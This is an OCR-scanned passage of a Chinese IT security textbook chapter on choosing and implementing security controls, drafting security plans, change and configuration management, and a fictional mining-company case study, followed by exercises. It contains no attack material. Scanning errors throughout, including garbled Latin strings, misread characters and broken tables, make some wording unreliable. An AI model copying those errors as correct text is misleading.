外 部 访问 的 。 一 些 控制 措施 ， 如 与 人 员 安 人 全、 标识 、 鉴 别 相 关 的 ， 应 该 不 能 通过 公开 接 
口 访问 ， 它 们 只 能 被 系统 管理 者 访问 。 因 此 对 这 些 控制 措施 的 应 用 范围 必须 仔细 规定 。 

e 基础 设施 控制 措施 (infrastructure control): 物理 访问 或 者 环境 控制 措施 仅 与 承载 相关 设 


350 p= FH P] 


备 的 区 域 相 关 。 

o 规模 问题 (scalability issue): 对 于 使 用 它们 的 组 织 ， 控 制 的 大 小 和 复杂 性 可 能 不 同 。 例 
如 ， 一 个 大 型 组 织 的 关键 系统 的 应 急 方案 将 会 比 小 公司 的 方案 要 大 得 多 也 详细 得 多 。 
© 风险 评估 (risk assessment) : 可 以 根据 组 织 中 系统 的 特定 风险 评估 来 调整 控制 措施 ， 这 

正 是 我 们 现在 所 考虑 的 。 

如 果 正 在 使 用 某 种 形式 化 或 非 形 式 化 的 风险 评估 过 程 ， 它 将 会 对 如 何 解决 组 织 信息 系统 存 
在 的 特定 风险 提供 指导 。 其 结果 就 是 选择 采用 一 些 运 行 层面 或 者 技术 层面 的 控制 措施 来 减少 风 
险 的 发 生 ， 使 得 组 织 的 风险 达到 一 个 可 以 接受 的 级 别 。 具 体 做 法 可 能 是 对 已 有 的 基线 控制 措施 
增添 一 些 新 的 控制 措施 ， 或 者 只 是 简单 地 对 当前 正在 使 用 的 控制 措施 进行 改进 ， 从 而 使 其 更 加 
具体 和 规范 。 

图 15-1 中 所 示 的 过 程 表 明 应 该 建议 一 系列 控制 措施 来 解决 每 个 需要 处 理 的 风险 。 建 议 的 
控制 措施 需要 与 组 织 的 系统 和 政策 兼容 ， 并 且 它 们 的 选择 也 可 能 受 法 律 要求 的 指导 。 选 择 的 控 
制 列 表 应 当 包 括 对 每 一 个 控制 措施 的 可 行 性 和 有 效 性 的 具体 描述 。 可 行 性 主要 涉及 几 个 因素 ， 
如 技术 兼容 性 、 对 已 有 系统 在 运行 方面 的 影响 以 及 用 户 接受 该 控制 措施 的 可 能 性 。 有 效 性 是 指 
实施 控制 措施 的 成 本 与 其 使 得 风险 等 级 降低 程度 之 比 。 

实施 一 种 新 的 或 加 强 的 控制 措施 所 带 来 的 风险 等 级 降低 ， 主 要 是 因为 控制 措施 降低 了 威胁 
的 可 能 性 或 后 果 ， 如 图 15-3 所 示 。 有 两 种 方法 能 降低 威胁 的 可 能 性 : 减少 系统 脆弱 性 (缺陷 
或 者 弱点 )， 或 者 降低 威胁 源 的 能 力 和 动机 。 减 少 威胁 带 来 的 后 果 是 通过 降低 组 织 内 威胁 的 负 
面 影响 来 实现 的 。 





图 15-3 ”残余 风险 


组 织 有 可 能 没有 足够 的 资源 去 实施 所 有 推荐 的 控制 措施 ， 因 此 管理 层 必须 进行 成 本 效益 分 
析 来 决定 在 当前 可 用 资源 的 情况 下 哪 一 种 控制 措施 最 合适 ， 并 且 能 给 组 织 提供 最 大 利益 。 这 样 
的 分 析 可 以 是 定性 的 ， 也 可 以 是 定量 的 ， 但 必须 证 明 实施 控制 措施 的 成 本 相对 于 减少 的 风险 来 
说 是 划算 的 。 它 应 该 包括 实施 新 的 或 增强 的 控制 措施 所 带 来 的 具体 影响 ， 不 实施 这 样 的 控制 措 
施 将 会 带 来 的 影响 以 及 估算 的 实施 成 本 。 最 后 必须 评估 相对 于 系统 和 关键 数据 来 说 实施 控制 措 
施 的 成 本 和 收益 ， 以 此 来 确定 选择 这 样 一 种 控制 措施 的 重要 性 。 

管理 层 必 须 确 定 ， 选 择 哪 一 种 控制 措施 能 使 组 织 的 系统 达到 可 以 接受 的 风险 级 别 。 在 选择 
控制 措施 的 时 候 将 会 考虑 到 如 下 的 因素 : 

o 如 果 一 种 控制 措施 对 风险 的 降低 程度 超过 了 需要 ， 则 可 以 选择 成 本 更 低 的 控制 措施 。 

o 如 果 一 种 控制 措施 的 成 本 高 于 它 所 降低 的 风险 ， 则 应 该 选择 其 他 控制 措施 。 

© 如 有 果 一 种 控制 措施 未 能 充分 降低 风险 ， 则 应 该 使 用 更 多 的 或 不 同 的 控制 措施 。 
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© 如 果 一 种 控制 措施 充分 地 降低 了 风险 并 且 是 最 合算 的 ， 那 么 就 采用 这 种 控制 措施 。 
通常 实施 一 项 控制 措施 的 代价 比 不 实施 它 的 代价 要 更 具体 上 且 容易 估算 。 管 理 层 必须 考虑 那 
些 不 太 明确 的 代价 ， 以 此 来 确定 最 终 控 制 措施 的 选择 以 及 残余 的 风险 。 497 


15.3 IT 安全 计划 


在 确定 了 管理 层 已 选择 实施 的 一 系列 可 能 控制 之 后 ， 应 该 创建 一 个 IT 安全 计划 ， 如 
图 14-1 和 图 15-1 所 示 。 在 安全 计划 中 描述 了 具体 要 做 什么 ,需要 什么 样 的 资源 ， 谁 是 负责 
As 目标 是 及 时 描述 为 改进 组 织 风 险 现 状 中 存在 的 缺陷 而 采取 的 措施 。NIST SP 800-30 (信息 
技术 系统 风险 管理 指南 ，2012 年 9 A) 建议 安全 计划 应 该 包含 如 下 的 细节 : 

e 风险 (资产 /威胁 /脆弱 性 的 组 合 ) 
推荐 的 控制 (来 自 风险 评估 ) 
对 每 一 个 风险 采取 措施 的 优先 级 
所 选择 的 控制 措施 (建立 在 成 本 效益 分 析 基 础 上 ) 
执行 所 选 控制 措施 所 需要 的 资源 
负责 人 员 
执行 目标 开始 日 期 和 结束 日 期 

e 维护 需求 和 其 他 意见 

这 些 细节 描述 是 在 实施 计划 (implementation plan) 表 中 总 结 出 来 的 ， 如 表 15-4 所 示 。 该 
表 描 述 了 针对 表 14-5 中 风险 识别 实例 的 实施 计划 的 例子 。 推 荐 的 控制 措施 是 远程 访问 、 可 审 
计 事 件 、 用 户 标识 、 系 统 备份 和 配置 变更 控制 等 方面 的 具体 实例 ， 应 用 于 已 识别 受到 威胁 的 资 
产 。 所 有 这 些 控制 措施 都 被 选中 了 ， 因 为 这 些 控 制 措施 的 成 本 不 高 ， 实 施 起 来 也 不 困难 。 不 过 
确实 需要 对 实施 过 程 做 一 些 改变 。 而 且 必 须 把 这 些 变化 通知 给 相关 网 络 管理 人 员 。 同 时 也 需要 
对 相关 员工 进行 培训 ,让 他 们 知道 如 何 正确 实施 新 规程 ， 并 了 解 其 权利 和 责任 。 

表 15-4 ”计划 的 实施 
风险 (资产 /威胁 ) ”| 针对 Internet 路 由 器 的 黑客 攻击 


风险 等 级 高 


。 取消 外 部 的 telnet 访问 

。 对 特权 级 命令 进行 更 详细 的 审计 
推荐 的 控制 。 针对 强 管理 员 口 令 做 一 些 规定 

。 为 路 由 器 配置 文件 设置 备份 策略 

。 为 路 由 器 配置 设置 变更 控制 策略 


优先 级 高 
。 实施 所 有 建议 的 控制 


已 选 控制 。 通 过 对 受 影 响 员工 的 培训 来 更 新 相关 程序 

wa 。 需 要 IT 网 络 管理 员 3 个 工作 日 的 时 间 来 改变 和 核对 路 由 器 配置 信息 以 及 编写 安全 策略 
。 需 要 1 个 工作 日 来 对 网 络 管理 人 员 进 行 培训 

负责 人 John Doe、 主 任 网 络 系统 管理 员 、 公 司 IT 支持 组 

始末 日 期 2017 年 2 月 6 日 至 2017 年 2 月 9 日 

备注 。 需 要 定期 测试 和 评审 采用 的 配置 和 策略 


15.4 ”控制 的 实施 
如 图 14-1 所 示 ，IT 安全 管理 过 程 的 下 一 阶段 是 实施 IT 安全 计划 中 描述 的 控制 措施 。 这 包 
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含 了 第 14 草 中 讨论 的 循环 实施 模型 的 “执行 ”阶段 。 实 施 阶段 不 仅 包含 了 和 直接 实 施 安全 计划 
中 描述 的 控制 措施 ， 而 且 也 包括 了 相关 的 特定 培训 和 组 织 的 总 体 安全 意识 方案 。 


15.4.1 安全 计划 的 实施 


IT 安全 计划 记录 着 对 每 一 个 选 定 的 控制 措施 所 要 做 的 工作 、 对 应 的 负责 人 以 及 所 需要 的 
资源 和 时 间 等 。 然 后 ， 被 指定 的 人 员 就 将 执行 计划 中 的 任务 以 实现 这 些 新 增 的 或 是 加 强 过 的 控 
制 措施 ， 上 有 具体 的 任务 可 能 是 技术 方面 的 、 管 理 方面 的 ， 或 者 运行 方面 的 。 整 个 过 程 可 能 涉及 系 
统 配置 的 变更 、 升 级 或 者 新 系统 的 安装 等 综合 信息 。 还 可 能 包含 开发 新 的 或 者 扩展 的 实施 程 
序 ， 用 以 记录 为 达到 预期 安全 目标 所 需要 的 实际 操作 。 需 要 注意 的 是 ， 即 使 是 技术 控制 ， 通 入 
也 需要 与 操作 程序 关联 起 来 ， 从 而 保证 它们 能 被 正确 使 用 。 这 些 程序 的 使 用 应 当 得 到 管理 层 的 
支持 和 监督 。 

我 们 应 该 监督 安全 计划 实施 的 过 程 从 而 确保 它们 的 正确 性 。 通 党 这 是 由 组 织 的 安全 官 来 执 
行 的 ， 他 们 检查 如 下 的 内 容 : 

o 控制 措施 实施 的 成 本 和 资源 是 否 在 规定 的 范围 内 。 

o 控制 措施 是 否 按 计 划 正 确实 施 ， 以 便 达 到 已 确定 的 风险 降低 水 平 。 

o 控制 措施 是 否 按 要 求 运 行 和 管理 。 

当 实 施 过 程 成 功 完成 时 ， 管 理 层 需要 授权 以 便 系 统 投 入 和 运行。 这 可 以 是 组 织 内 部 非 形式 化 
的 一 个 过 程 。 但 是 在 有 些 情 况 下 ， 特 别 是 对 于 政府 部 门 ， 该 过 程 是 认可 系统 满足 要 求 标准 的 形 
式 化 过 程 的 一 部 分 。 这 通常 与 我 们 在 第 27 章 所 讨论 的 可 信 计 算 系 统 的 安装 、 认 证 和 使 用 相关 
联 。 在 这 种 情况 下 ， 需 要 外 部 鉴定 机 构 来 核实 该 系统 被 正确 设计 并 实现 的 所 记录 的 证 据 。 


15.4.2 ”安全 意识 与 培训 


对 组 织 的 全 体 员工 进行 适当 的 安全 意识 培训 ， 并 针对 特定 的 系统 和 控制 措施 进行 具体 的 培 
训 ， 这 是 实施 控制 措施 的 一 个 必要 的 组 成 部 分 。 我 们 将 在 第 17 章 进一步 讨论 这 些 问题 ， 届 时 
将 探讨 与 人 员 安全 相关 的 策略 。 


15.5 ”监视 风险 


IT 安全 管理 过 程 并 不 是 在 控制 措施 的 实施 以 及 对 相关 人 员 的 培训 之 后 就 结束 。 正 如 我 们 
在 第 14 章 中 提 到 的 ， 这 是 一 个 循环 的 过 程 ， 将 一 直 不 停 地 重复 下 去 ， 以 此 来 对 信息 系统 和 风 
险 环境 做 出 响应 。 各 种 控制 措施 实施 后 ， 我 们 还 应 当 对 其 进行 监视 ， 从 而 确保 它们 持续 有 效 ， 
任何 对 系统 做 出 变更 的 提议 都 应 该 经 过 安全 审查 ， 有 必要 的 话 还 应 该 对 涉及 的 系统 重新 做 一 次 
风险 评 佑 。 遗 憾 的 是 ，IT 安全 管理 在 这 方面 经 常 是 最 不 受 重视 的 ， 大 多 数 情况 下 只 是 在 事后 
才 对 其 进行 考虑 。 如 果 我 们 不 对 变更 系统 的 提议 进行 安全 审查 ， 将 会 极 大 增加 安全 事故 发 生 的 
可 能 性 。 管 理 过 程 的 后 续 阶 段 包括 如 下 几 方 面 内 容 : 

© 维护 安全 控制 

o 安全 符合 性 检查 

e 变更 和 配置 管理 

o 事件 处 理 

其 中 任何 一 个 方面 都 可 能 声明 需要 对 IT 安全 管理 过 程 中 以 前 的 一 些 阶段 做 出 一 定 的 改变 。 
一 个 明显 的 例子 是 : 如 果 有 违背 安全 规则 的 行为 发 生 ， 比 如 一 个 桌面 系统 感染 了 病毒 ， 那 么 就 
要 对 该 风险 评估 所 选择 的 控制 措施 或 者 对 实施 的 具体 细节 做 一 些 修改 。 这 就 会 导致 对 过 程 的 前 
期 阶段 重新 进行 审查 。 


RISE! ITKAHEH, HRIFPAMF 353 


15.5.1 维护 


首先 考虑 的 问题 是 对 实施 的 控制 措施 进行 持续 的 维护 和 监督 ， 确 保 它 们 一 直 正 确 且 正确 地 
被 执行 。 有 人 负责 维护 过 程 是 非常 重要 的 ， 这 通常 是 由 组 织 的 安全 官 来 协调 的 。 维 护 工作 主要 
是 确保 : 

© 对 控制 措施 定期 评审 ， 核 实 它 们 仍然 能 实现 预期 功能 。 

© 当 有 新 的 需求 的 时 候 ， 对 控制 措施 进行 更 新 。 

© 系统 的 变更 不 会 对 控制 措施 产生 负面 的 影响 。 

o 新 的 威胁 或 脆弱 性 还 未 被 公开 。 

评审 包括 定期 分 析 日 志文 件 ， 以 确保 各 种 系统 组 件 按 预 期 的 功能 运行 ， 并 在 处 理事 件 时 确 
定 可 以 与 异常 事件 进行 比较 的 活动 基线 。 我 们 将 在 第 18 章 进一步 讨论 安全 审计 。 

维护 的 目的 是 确保 控制 措施 按照 要 求 运作 ， 从 而 使 得 组 织 的 风险 维持 在 一 个 预定 的 水 平 。 
如 果 不 能 维护 这 些 控 制 措施 ， 就 会 导致 安全 违规 ， 从 而 对 组 织造 成 潜在 的 严重 影响 。 


15.5.2 ”安全 符合 性 


安全 符合 性 (security compliance) 检查 就 是 评审 组 织 的 安全 过 程 的 审计 过 程 。 目 的 是 核查 
安全 计划 的 符合 性 。 审 计 可 以 由 内 部 人 员 或 外 部 人 员 进 行 。 该 过 程 一 般 基 于 核查 表 完 成 ， 验 证 
是 否 创 建 了 合适 的 策略 和 计划 ， 是 否 选择 了 合适 的 控制 措施 ， 以 及 这 些 控制 措施 是 否 得 到 了 正 
确 的 维护 和 使 用 。 

该 审计 过 程 对 于 新 的 信息 系统 和 服务 ， 应 在 其 实施 时 同步 进行 ; 对 于 已 有 系统 ， 通 常 作为 
组 织 更 广泛 、 更 普遍 的 审计 过 程 的 一 部 分 而 定期 进行 ， 或 者 当 组 织 的 安全 方针 发 生变 化 时 进行 。 


15.5.3 ”变更 与 配置 管理 


变更 管理 ( change management) 主要 是 对 影响 组 织 的 系统 及 其 使 用 的 系统 变更 提议 进行 评 
审 的 过 程 。 很 多 原因 都 可 能 导致 对 已 有 系统 进行 变更 ， 例 如 : 

e 用 户 反 馈 的 问题 或 者 用 户 要 求 改进 系统 。 

e 发 现 系 统 存 在 新 的 威胁 或 者 脆弱 性 。 

e 通知 用 户 安 竣 补 丁 或 者 对 软 人 硬件 进行 升级 。 

e 技术 的 发 展 。 

o 新 的 IT 特征 或 服务 的 实施 ， 要 求 对 已 有 系统 进行 变更 。 

e 出 现 新 任务 ， 要 求 对 已 有 系统 进行 变更 。 

应 该 对 任何 一 个 变更 组 织 的 系统 的 提议 可 能 带 来 的 影响 进行 评估 。 这 不 但 包括 与 安全 相 
关 的 问题 ， 而 且 包 括 诸如 操作 等 方面 的 问题 。 对 系统 变更 的 管理 是 整个 系统 管理 过 程 中 非常 重 
要 的 一 部 分 。 因 为 系统 的 变更 将 会 影响 到 系统 的 安全 ， 所 以 这 一 过 程 和 IT Re A HS, 
而 且 必 定 相 互 影响 。 2 

一 个 重要 的 例子 是 ， 为 了 解决 一 个 普通 操作 系统 和 应 用 程序 的 缺陷 及 安全 问题 ， 经 常 需 要 
对 其 打 补丁 。 如 果 组 织 正 在 运行 一 套 系统 ， 该 系统 运行 着 一 系列 的 应 用 程序 ， 那 么 不 管 该 系统 
的 复杂 程度 如 何 ， 针 对 该 系统 的 任何 补丁 都 需要 对 其 进行 检查 以 保证 不 会 对 其 他 的 应 用 程序 产 
生 副 作用 。 这 是 一 个 非常 耗 时 的 过 程 ， 因 为 它 需要 耗费 相当 多 的 管理 资源 ， 并 且 可 能 会 使 组 织 
在 一 段 时 间 内 暴露 出 新 的 漏洞 。 和 否则， 可 以 在 不 进行 测试 的 情况 下 应 用 补丁 或 升级 ， 这 可 能 导 
致 系统 中 的 其 他 故障 和 功能 的 丧失 ， 但 由 于 更 快 的 修补 也 将 提高 系统 安全 性 。 管 理 层 需要 决定 
在 这 种 情况 下 可 用 性 或 安全 性 是 否 具 有 更 高 的 优先 级 。 

理想 状况 就 是 对 系统 做 出 变更 后 ， 系 统 的 安全 性 能 够 得 到 提高 。 但 是 实际 情况 可 能 是 ， 基 


于 一 些 必要 的 商业 原因 而 强制 对 系统 进行 的 修改 反而 会 降低 系统 的 安全 性 。 在 这 种 情况 下 ， 记 
录 下 系统 改变 的 原因 ， 系 统 改变 对 组 织 安全 性 能 的 影响 以 及 管理 部 门 对 该 改变 的 授权 过 程 就 显 
得 尤为 重要 。 组 织 获 得 的 利益 可 能 是 以 增加 风险 等 级 为 代价 的 。 

变更 管理 过 程 可 能 是 非 形式 化 或 形式 化 的 ， 这 取决 于 组 织 的 规模 和 它 整体 的 信息 系统 管理 过 
程 。 在 形式 化 过 程 中 ， 任 何 一 个 对 系统 进行 变更 的 提议 都 应 该 被 记录 下 来 ， 并 且 在 实施 之 前 对 其 
测试 。 作 为 该 过 程 的 一 部 分 ， 任 何 相关 的 文档 ， 包 括 相 关 的 安全 文档 和 程序 都 应 该 及 时 进行 更 新 
以 反映 改变 。 

配置 管理 ( configuration management) 专门 跟踪 每 个 系统 正在 使 用 的 配置 信息 及 其 变更 情 
况 ， 包 括 每 个 系统 安装 的 软件 和 硬件 版 本 信息 。 这 些 信 息 有 助 于 在 系统 裔 溃 后 对 其 进行 恢复 
(不 管 是 否 涉及 安全 问题 )， 同 时 我 们 也 需要 这 些 信 息 来 帮助 我 们 了 解 哪 些 补 本 和 升级 软件 可 能 
和 一 个 特殊 系统 相关 。 再 次 重申 一 下 ， 这 是 一 个 和 安全 相关 的 稼 规 的 系统 管理 过 程 ， 它 必须 和 
IT 安全 管理 相 结合 。 


15.5.4 事件 处 理 


该 过 程 主要 是 对 安全 事件 进行 响应 ， 是 IT 安全 管理 后 续 阶 段 的 最 后 一 部 分 内 容 。 该 主题 
将 在 第 17 章 进一步 讨论 ， 届 时 我 们 将 探讨 与 人 为 因素 相关 的 安全 策略 。 


15.6 RHF: 银 星 矿业 


考虑 第 14 章 中 介绍 的 案例 ， 该 案例 涉及 一 个 虚构 的 公司 : 银 星 矿业 公司 的 运作 情况 。 假 
设 我 们 已 经 知道 了 针对 该 公司 的 风险 评估 结果 ， 安 全 管理 的 下 一 步 就 是 确定 可 能 的 控制 措施 。 
从 风险 评估 提供 的 信息 来 看 ， 很 显然 表 15-3 中 的 很 多 控制 措施 都 不 能 使 用 。 其 中 有 一 条 意见 
被 多 次 反映 ， 那 就 是 该 公司 正在 使 用 的 许多 系统 都 没有 进行 定期 更 新 ， 并 且 已 识别 风险 对 系统 
安全 构成 潜在 威胁 的 部 分 原因 是 存在 一 个 已 经 公开 但 未 打 补 丁 的 漏洞 。 这 显然 表明 ， 我 们 应 该 
关注 这 样 一 些 相 关 的 控制 措施 ， 那 就 是 对 服务 器 和 客户 的 操作 系统 以 及 应 用 软件 进行 定期 的 系 
统 维护 。 这 些 控 制 措施 包括 : 

e 配置 管理 策略 与 规程 
基线 配置 
系统 维护 策略 与 规程 
定期 维护 
缺陷 修复 
针对 恶意 代码 的 保护 
针对 垃圾 邮件 和 间谍 软件 的 保护 

考虑 到 潜在 的 事件 可 能 发 生 ， 我 们 也 应 该 注意 制定 针对 意外 事件 的 计划 来 检测 和 应 对 这 样 
的 事件 ， 并 且 使 得 系统 的 功能 能 够 得 到 迅速 的 恢复 。 我 们 应 该 关注 如 下 控制 措施 : 

e 审计 监视 、 分 析 与 报告 

e 审计 归 约 与 报告 生成 

e 应 急 规划 策略 与 规程 

o 事件 响应 策略 与 规程 

e 信息 系统 备份 

e 信息 系统 恢复 与 重建 

这 些 控制 措施 通常 可 以 适用 于 所 有 已 知 的 风险 并 且 可 以 被 组 成 一 个 易于 管理 的 系统 。 因 此 
这 些 控制 措施 的 成 本 效益 是 很 高 的 ， 因 为 他 们 针对 多 种 已 识别 的 风险 提供 了 更 高 的 安全 水 平 。 
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现在 我 们 考虑 具体 的 风险 项 目 。 最 高 优先 级 的 风险 与 SCADA (Supervisory Control And 
Data Acquisition， 监 控 与 数据 采集 ) 结 点 和 网 络 的 可 靠 性 、 完 整 性 相关 。 这 是 因为 该 公司 的 许 
多 系统 都 在 运行 存在 一 些 已 知 漏洞 的 老 版 本 的 操作 系统 。 另 外 ， 这 些 系统 不 能 打 补 丁 或 升级 是 
因为 它们 所 运行 的 关键 应 用 程序 还 没有 被 升级 或 者 还 没有 被 授权 ， 所 以 还 不 能 运行 新 版 本 的 操 
作 系 统 。 考 虑 到 在 减少 单独 结 点 脆弱 性 时 存在 的 这 些 限制 ， 我 们 应 该 关注 能 将 SCADA 结 点 和 
网 络 从 更 广泛 的 公司 网 络 中 隔离 出 来 的 防火 墙 和 应 用 程序 代理 服务 器 。 可 以 根据 我 们 确定 的 一 
般 应 用 的 控制 列表 定期 维护 和 管理 这 些 系统 。 另 外 ， 由 于 进出 SCADA 网 络 的 通信 是 高 度 结构 
化 的 并 且 是 可 以 预知 的 ， 因 此 运行 一 套 人 侵 检 测 系统 可 能 比 运行 通常 使 用 的 公司 网 络 要 可 靠 得 
多 。 该 系统 应 该 可 以 鉴别 攻击 的 流量 ， 因 为 这 和 正常 的 通信 流 差别 很 大 。 这 样 一 个 系统 还 可 能 
涉及 对 审计 记录 进行 自动 的 、 细 致 的 分 析 ， 其 中 的 审计 信息 来 自 于 已 有 防火 墙 或 者 代理 服务 需 
系统 。 更 可 能 的 情况 是 ， 存 在 一 个 独立 的 系统 通过 上 面 这 些 系统 来 连接 和 监视 网 络 流量 。 整 个 
系统 还 能 进一步 扩展 成 一 个 具有 自动 啊 应 能 力 的 系统 。 当 攻击 被 检测 出 来 的 时 候 ， 该 系统 能 够 
自动 为 网 络 连 接 提供 服务 。 这 使 我 们 意识 到 ， 对 于 SCADA 结 点 的 正确 操作 是 不 需要 网 络 连 接 
的 。 事 实 上 ， 本 来 的 设计 也 是 让 这 些 结 点 的 运行 不 需要 网 络 连接 ， 这 是 导致 它们 不 安全 的 主要 
原因 。 这 样 所 有 可 能 的 代价 就 是 改进 的 总 体 监 视 和 对 SCADA 结 点 的 管理 。 如 果 这 些 都 正常 工 
作 的 话 ， 系 统 被 成 功 攻 击 的 可 能 性 已 经 非常 低 了 ， 但 仍然 有 可 能 进一步 降低 。 

第 二 优先 级 的 风险 和 存储 信息 的 完整 性 相关 。 很 显然 ， 所 有 通用 控制 都 会 帮助 降低 该 风 
险 。 更 具体 的 情况 是 ， 大 量 的 文件 分 布 在 多 个 管理 不 一 致 的 系统 中 ， 这 就 会 引发 很 多 问题 。 如 
果 公 司 运 作 的 所 有 关键 文件 都 存储 在 一 个 运行 程序 较 少 的 文件 服务 器 上 上， 那么 风险 就 比较 容易 
被 管理 。 通 过 使 用 通用 控制 就 可 以 对 其 进行 恰当 的 管理 。 这 表明 我 们 需要 对 关键 文件 做 一 个 审 
计 ， 这 样 我 们 就 能 知道 谁 是 这 些 文件 的 负责 人 ， 这 些 文件 当前 被 存在 什么 地 方 。 我 们 还 需要 一 
项 策略 来 详细 规定 关键 的 文档 应 该 只 能 在 被 批准 的 中 心服 务 器 上 建立 和 存储 。 已 有 的 文件 也 应 该 
被 转移 到 这 些 服务 器 上 。 还 要 对 涉及 的 用 户 进 行 适当 的 教育 和 培训 以 确保 这 些 策略 被 正确 地 执行 。 

接 下 来 的 三 个 风险 涉及 关键 的 财务 、 采 购 和 维护 /生产 系统 的 可 用 性 或 者 完整 性 。 我 们 确 
定 的 普遍 适用 的 控制 措施 : 一 旦 将 它们 用 于 所 有 相关 服务 器 ， 就 应 该 能 够 充分 解决 这 些 风 险 。 

最 后 一 个 风险 与 电子 邮件 的 可 用 性 、 完 整 性 和 保密 性 相关 。 正 如 在 风险 评估 中 提 到 的 ， 这 
主要 是 母 公司 管 理 外 部 邮件 网 关 的 IT 集团 的 责任 。 在 本 地 站 点 上 能 做 的 工作 很 少 。 一 般 控制 
措施 的 使 用 都 将 会 帮助 减少 这 一 风险 ,特别 是 与 客户 端 恶 意 代码 保护 以 及 垃圾 邮件 、 间 谍 软 件 
保护 相关 的 一 些 控制 措施 。 除 此 之 外 ,作为 应 急 规 划 和 事件 响应 策略 与 规程 的 一 部 分 ,我 们 应 
该 考虑 建立 一 个 电子 邮件 备份 系统 。 为 了 安全 起 见 ， 该 系统 使 用 和 公司 内 部 网 络 分 离 的 客户 站 
系统 ， 连 接 到 一 个 外 部 的 本 地 网 络 服务 提供 商 。 在 公司 内 部 的 电子 邮件 系统 受到 损害 时 ， 这 个 
连接 将 为 关键 消息 提供 受 限 的 电子 邮件 能 力 。 

表 15-5 总 结 了 对 可 能 的 控制 措施 的 分 析 。 该 表 也 列 出 了 确定 的 控制 措施 以 及 实施 的 优先 
级 。 还 必须 对 这 张 表 进行 扩展 ， 应 该 将 所 需要 的 资源 、 责 任 人 员 、 时 间 期 限 以 及 其 他 建议 的 详 
细 信 息 都 包括 进来 。 然 后 就 可 以 实施 这 个 计划 ,并 对 其 进展 进行 适宜 的 监视 。 在 该 计划 成 功 实 
施 之 后 ， 一 些 更 长 期 的 后 续 工 作 就 会 随 之 产生 ， 这 些 后 续 工 作 是 为 了 确保 新 的 策略 一 直 被 恰当 
地 应 用 ， 以 及 确保 对 公司 的 安全 状况 进行 定期 评审 。 届 时 将 开始 新 一 轮 的 风险 评估 、 计 划 制 定 


以 及 相应 的 后 续 工 作 。 


表 15-5 银 星 矿业 一 一 实施 计划 


风险 等 级 推荐 的 控制 措施 已 选 控制 措施 
| 服务 器 的 配置 和 定期 维护 策略 e 





风险 (资产 / 威胁 ) 
所 有 风险 (普遍 适用 ) 









( 续 ) 


风险 (资产 /威胁 ) | 风险 等 级 推荐 的 控制 措施 已 选 控制 措施 


2. 恶意 代码 (垃圾 邮件 / 间谍 软件 ) 预防 
3. 关于 服务 器 的 审计 监视 、 分 析 、 归 约 和 报告 
4. 应 急 计 划 和 事件 啊 应 策略 与 规程 

5. 系统 备份 与 恢复 规程 


a xe 1. 人 侵 检测 与 响应 系统 1 
3 用 户 安全 教育 与 培训 


15.7 关键 术语 、 复 习题 和 习题 










所 有 风险 (普遍 适用 ) 


wm wo 


关键 术语 

change management (变更 管理 ) management control (管理 控制 措施 ) 
configuration management (配置 管理 ) operational control (操作 控制 措施 ) 
control (控制 措施 ) preventative control (预防 性 控制 措施 ) 
countermeasure (对 策 ) safeguard (保障 措施 ) 

detection and recovery control (检测 与 恢复 控制 措施 ) security compliance (安全 符合 性 ) 
implementation plan (实施 计划 ) supportive control ( 文 持 性 控制 措施 ) 
IT security plan (IT 安全 计划 ) technical control (技术 控制 措施 ) 
复习 题 


15.1 给 出 安全 控制 或 保障 措施 的 定义 。 

15.2 ” 列 出 并 简单 地 定义 三 个 控制 大 类 ， 以 及 每 一 大 类 中 包含 的 三 个 类 别 。 

15.3 ”针对 表 15-3 中 给 出 的 三 个 控制 大 类 分 别 列举 一 个 具体 的 例子 。 

15.4 列 出 我 们 讨论 的 选择 和 实施 控制 措施 的 步骤 。 

15.5 列 出 三 种 能 够 降低 残余 风险 级 别 的 实施 新 的 或 者 改进 的 控制 措施 的 方法 。 

15.6 列 出 在 IT 安全 实施 计划 中 应 该 包含 的 项 目 。 

15.7 列 出 并 简单 地 定义 在 IT 安全 管理 中 实施 控制 措施 阶段 的 要 素 。 

15.8 组 织 的 安全 官 在 实施 计划 时 需要 检查 哪些 内 容 ? 

15.9 列 出 并 简单 地 定义 在 IT 安全 管理 中 后 续 工作 阶段 的 要 素 。 

15.10 ”变更 与 配置 管理 作为 整体 系统 管理 过 程 与 作为 组 织 IT 安全 风险 管理 过 程 的 关系 是 怎样 的 ? 


习题 


15.1 考虑 在 习题 14.2 中 讨论 的 “由 于 蠕虫 和 病毒 侵入 系统 导致 文件 的 破坏 ”对 “系统 文件 中 客户 和 金 
融 数据 文件 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 
说 明 你 认为 其 中 哪 一 项 最 合算 。 

15.2 考虑 在 习题 14.3 中 讨论 的 因为 “职员 的 经 济 欺骗 行为 ， 改 变 了 账目 记录 ”从 而 导致 对 “服务 器 端 


15.3 


15.4 


15.5 


15.6 


账目 记录 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 [504 
明 你 认为 其 中 哪 一 项 最 合算 。 re 
考虑 在 习题 14.4 中 讨论 的 因为 “对 Web 服务 器 的 攻击 和 主页 的 破坏 ”从 而 导致 对 “公司 Web 服务 

器 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认 

为 其 中 哪 一 项 最 合算 。 

考虑 在 习题 14.5 中 讨论 的 因为 “对 机 密 信息 和 敏感 信息 的 窃取 和 破坏 ”从 而 导致 对 “存储 在 服务 

器 上 的 用 于 对 客户 进行 渗透 测试 的 技术 和 这 些 测试 结果 的 保密 性 ”造成 的 风险 。 从 表 15-3 中 选择 

一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认为 其 中 哪 一 项 最 合算 。 

考虑 在 习题 14.6 中 讨论 的 因为 “偷窃 笔记 本 电脑 ， 从 中 获得 机 主 的 个 人 信息 ， 并 且 利 用 这 些 信 息 ” 

从 而 对 “存储 在 未 加 密 的 笔记 本 电脑 中 的 个 人 信息 的 保密 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 

合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认为 最 划算 的 是 哪个 。 

考虑 在 习题 14.7 中 讨论 的 对 一 个 小 型 公共 服务 机 构 进行 评估 后 的 风险 。 选 择 出 你 认为 最 关键 的 风 

险 ， 并 从 表 15-3 中 选择 一 些 适当 的 能 够 降低 该 风险 的 控制 措施 。 并 说 明 你 认为 其 中 哪 一 项 最 合算 。 
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学 习 目标 
